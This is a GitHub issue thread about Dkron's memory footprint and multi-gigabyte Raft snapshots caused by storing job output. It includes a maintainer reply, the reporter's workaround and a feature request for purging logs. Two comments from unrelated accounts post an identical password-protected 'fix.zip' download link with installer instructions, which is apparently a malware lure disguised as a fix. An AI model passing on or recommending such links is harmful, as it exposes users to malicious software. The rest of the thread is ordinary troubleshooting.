### ISSUE TITLE
Dkron using gigs of memory

### ISSUE THREAD

**Issue by PraedictixIT** [distribworks/dkron#1566]
I've been testing Dkron and over time the memory footprint has grown to 4.1G.  And the snapshot files have grown to 3.2G

I do have a lot of jobs running that have debug mode turned on and are outputting a lot of text.  I swear I read somewhere the database trims itself automatically but overall the memory print continues to grow (but I can't seem to find that now).  Is this growth expected?  

Are there options for clearing out the history of the jobs and hopefully reducing the memory footprint? 

ps -C dkron -o rss
  RSS
4371128

/dkron.data/raft/snapshots/4-3258718-1724670422297:
total 3.2G
-rw-r--r-- 1 root root 3.2G Aug 26 06:07 state.bin
-rw-r--r-- 1 root root  426 Aug 26 06:07 meta.json

/dkron.data/raft/snapshots/4-3267159-1724676311715:
total 3.2G
-rw-r--r-- 1 root root 3.2G Aug 26 07:45 state.bin
-rw-r--r-- 1 root root  426 Aug 26 07:45 meta.json

/dkron.data/raft/snapshots/4-3275537-1724682015330:
total 3.2G
-rw-r--r-- 1 root root 3.2G Aug 26 09:20 state.bin
-rw-r--r-- 1 root root  426 Aug 26 09:20 meta.json

Ubuntu 22.04
Dkron 3.2.6  (I reviewed the change log for 3.2.7 and I didn't see any changes that would resolve this)

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vcastellm** [comment]
No the growth in memory usa is not expected, and yes the disk space only contains last 100 execution logs. The test environment remains pretty stable along time http://test.dkron.io:8080/ui/

Can you elaborate on what "debug mode" means?

**Comment by PraedictixIT** [comment]
Debug mode for my scripts Dkron is executing.  This means there are large amounts of text to standard out.  It appears by default Dkron keeps this text in memory (key value store) for every execution (https://dkron.io/docs/usage/processors/#built-in-processors).   

To resolve this issue I performed a backup, shutdown all the servers, deleted all the dkron data, bootstrapped and reconfigured the cluster, edited my backup file of the jobs send standard out to /dev/null, and then restored the backup file.  Since performing this config change Dkron hasn't taken up more than 100MBs of memory and the state.bin file is no more than 16MBs.  

This issue should maybe be switched over to a feature request.  As I don't really want to use any logging processor but there is the rare need for me to review logs within the web interface for debugging.  I would love that the system would have a periodical purge of this key value store based on a config option.  Or just an API call that would allow me to purge key value stores.  

Also may I suggest the information about the default use of the key value store be mentioned in the Install or Config documentation.  With this kind of default behavior I would expect others to hit this pitfall.

Thanks!

**Comment by vcastellm** [comment]
Prob duplicate of https://github.com/distribworks/dkron/issues/1673

**Comment by Raven888888** [comment]
@vcastellm I don't think this is duplicate. I think what @PraedictixIT suggests is very viable. 

We face the same problem too, the state.bin in snapshots take is ~GB in size, and each time the dkron docker compose is restarted, it takes ~10minutes to load and start functioning.

Having able to see logs in the UI is nice, but we need a way to purge old logs. And logs should not need to affect the startup time.
